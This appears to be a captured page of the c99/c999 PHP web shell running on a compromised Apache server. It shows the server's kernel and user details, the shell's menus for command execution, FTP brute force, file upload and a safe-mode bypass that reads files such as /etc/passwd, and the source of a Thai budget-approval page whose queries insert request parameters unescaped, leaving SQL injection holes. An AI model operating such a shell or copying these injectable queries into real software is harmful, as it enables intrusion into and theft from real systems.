!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/Money_depart/   drwxr-xr-x
Free 52.61 GB of 127.8 GB (41.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     SearchApprovalList.php (20.09 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
";
		echo "

กรุณาทำการ Login ก่อน
";
		echo "";
		exit();
	} 
	else {
	/**  Configuration  */
	include( "../configuration.php" );
	require_once( $_Config_absolute_path . "/includes/framework.php" );
	require_once( "../includes/Function.php" );

	/**  Create Database Object  */
	$dbObj = new DBConn;
	

		/**  Config Table for This Page  */
		$myTable = "formaoffice"; 
		$myTable1 = "personal_tb";
		$myTable3 = "budget_year_tb";
		$myTablePK = "codeId";
		$myTableField1 = "maNo";
	    $myTableField2 = "Orderlist";
	    $myTableField3 = "Training_name";
	    $myTableField4 = "Budget_use";
	  
		
	/**  Paging */
	$page = $_GET['page'];
	if( $page == "" ) { $page = 1; }
	
	if( $Year == "" )
		$Year = date("Y")-543;
		
	/**  Keyword and Field */
	$keyword = $_REQUEST['keyword'];
	$selectType = $_REQUEST['selectType'];
	
	/**  จำนวนข้อมูล ต่อ 1 หน้า  */
	$perpage = $_REQUEST['perpage'];
	if( $perpage == "" ) { $perpage = 20; }
	
	/**  Botton Name Action */
		$action = $_REQUEST['action'];
		$id = $_REQUEST['id'];
	
		if( isset($action) && !empty($action) ) {
			switch( $action ) {
				case "Update" :
					$num = count($id);
					for( $i=0; $i<$num; $i++ ) {
						//--- college
						$qryUp = " UPDATE  formaoffice  SET   Flag3 = 'Y' , date_added =NOW()  WHERE   codeId='$id[$i]' ";
						$resultUp = $dbObj->runQuery($qryUp);
						$dbObj->freeresult($resultUp);
					} # for
				break;
				case "Reset" :
					$num = count($id);
					for( $i=0; $i<$num; $i++ ) {
						//--- college
						$qryUp = " UPDATE  formaoffice  SET   Flag3 = ' '  WHERE  codeId='$id[$i]' ";
						$resultUp = $dbObj->runQuery($qryUp);
						$dbObj->freeresult($resultUp);
					} # for
				break;
			} # switch
		} # if
	
	//**  Parameter  */
	$param = "Year_std=$Year_std&keyword=$keyword&selectType=$selectType";  
		
		} # else
?>




<?=$_Config_sitename;?> - ข้อมูลงานวิจัย - ข้อมูลงานวิจัยตามรายบุคคล - ค้นหางานวิจัย








  

    
    
    execQuery($query);
		$numrows = $dbObj->_numrows;
		//echo $query;
		
		/**  Paging  */
		$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */
		
		if( $keyword != "" ) { 
			if( $selectTypeBook != "" ) { 
				if( isset($_GET['OrderBy']) ) {
					switch( $selectTypeBook ) {
						case 1 :
							$query = " SELECT *  FROM $myTable  WHERE  Year_std='$Year_std'  AND  $myTableField1 LIKE '%$keyword%'  
											   ORDER BY  $OrderBy  $ASCDESC ";
							break;
						case 2 :
							$query = " SELECT *  FROM $myTable  WHERE  Year_std='$Year_std'  AND  $myTableField2 LIKE '%$keyword%'  
											   ORDER BY  $OrderBy  $ASCDESC ";
							break;
						case 3 :
							$query = " SELECT *  FROM $myTable  WHERE  Year_std='$Year_std'  AND  $myTableField3 LIKE '%$keyword%'  
											   ORDER BY  $OrderBy  $ASCDESC ";
							break;
						case 4 :
							$query = " SELECT *  FROM $myTable  WHERE  Year_std='$Year_std'  AND  $myTableField4 LIKE '%$keyword%'  
											   ORDER BY  $OrderBy  $ASCDESC ";
							break;
						
					} # switch
				} # if
				elseif( !isset($_GET['OrderBy']) ) {
					switch( $selectTypeBook ) {
						case 1 :
							$query = " SELECT *  FROM $myTable  WHERE  Year_std='$Year_std'  AND  $myTableField1 LIKE '%$keyword%'  
							ORDER BY $myTablePK  ASC ";
							break;
						case 2 :
							$query = " SELECT *  FROM $myTable  WHERE  Year_std='$Year_std'  AND  $myTableField2 LIKE '%$keyword%'  
							ORDER BY $myTablePK  ASC ";
							break;
						case 3 :
							$query = " SELECT *  FROM $myTable  WHERE  Year_std='$Year_std'    AND  $myTableField3 LIKE '%$keyword%'  
							ORDER BY $myTablePK  ASC ";
							break;
						case 4 :
							$query = " SELECT *  FROM $myTable  WHERE   Year_std='$Year_std'  AND  $myTableField4 LIKE '%$keyword%'  
							ORDER BY $myTablePK  ASC ";
							break;
						
					} # switch
				} # elseif
			} else {  // หาเฉพาะที่ใส่ Keyword
				if( isset($_GET['OrderBy']) ) {
					$query = " SELECT *  FROM $myTable  WHERE  Year_std='$Year_std'  AND  ( $myTableField1 LIKE '%$keyword%'  
									   OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%'  OR  $myTableField4 LIKE '%$keyword%' )  ORDER BY  $OrderBy  $ASCDESC ";
				} 
				elseif( !isset($_GET['OrderBy']) ) {
					$query = " SELECT *  FROM $myTable  WHERE  Year_std='$Year_std'  AND  ( $myTableField1 LIKE '%$keyword%'  
									   OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%'  OR  $myTableField4 LIKE '%$keyword%' )  ORDER BY  $myTablePK  ASC ";
				}
			} # else
		} else {
			if( isset($_GET['OrderBy']) ) {
				$query = " SELECT *  FROM $myTable  WHERE  Year_std='$Year_std'  ORDER BY  $OrderBy  $ASCDESC ";
			} 
			elseif( !isset($_GET['OrderBy']) ) {
				$query = " SELECT *  FROM $myTable  WHERE  Year_std='$Year_std'  ORDER BY  $myTablePK  ASC ";
			} # elseif
		} # else
		
						
		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);
    ?>
     

     

      

        
      

      

        หน้าหลัก » เมนูแสดงรายละเอียดของแผน » ข้อมูลการขออนุมัติใช้เงินและการดำเนินการตามแผน/โครงการ
        

      

        

          

            
          

          

             ‹ ย้อนกลับ
          

          

            
            

          

            ทั้งหมด:  รายการ
            จำนวนข้อมูลต่อหน้า
                
          

        

      

      

         0 ) { ?>
          

            

              ค้นหา  จาก 
			     
              
                
                
              
            

          

          fetchArray($result) ) { 
				$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
          ?>
            freeresult($result);
          ?>
          

            

              ลำดับ
              รายชื่อผู้ขออนุมัติเดินทางไปราชการ
              ข้อแผน
              จำนวนเงิน
              วันที่ไปราชการ
              Edit
              
                
              

            

              
                
              
                               
                
              
                
              
              
                
              
                -
                
               แก้ไขข้อมูล  
               />
              

            

          
          
        

          

            ไม่พบรายการที่ค้นหา

              กรุณาลองใหม่อีกครั้ง


              		
          

        

        
        

          

             0 ) { ?>
              

                

                  
                

                

                  Page :
                     1) {	
                            $previous = $display - 1;					
                    ?>
                    
bool(false)




:: Command execute ::


Enter:  
Select: 
 






:: Shadow's tricks :D  ::



  

    
Useful Commands 
    

    

      

        
        
          
        
         
        
          

        Warning. Kernel may be alerted using higher levels 

    

    

  

   
Kernel Info: 

      
      
	  
	  
	  
	  
    

    







:: Preddy's tricks :D  ::



  

    
Php Safe-Mode Bypass (Read Files)
    


    

      

      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      

    

    

  

   
Php Safe-Mode Bypass (List Directories):     

      


      Dir:  

 eg: /etc/


    

    








 
:: Search ::
  - regexp 

 
:: Upload ::
 
[ ok ]






:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]


:: Go Dir ::
 
:: Go File ::
 


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]--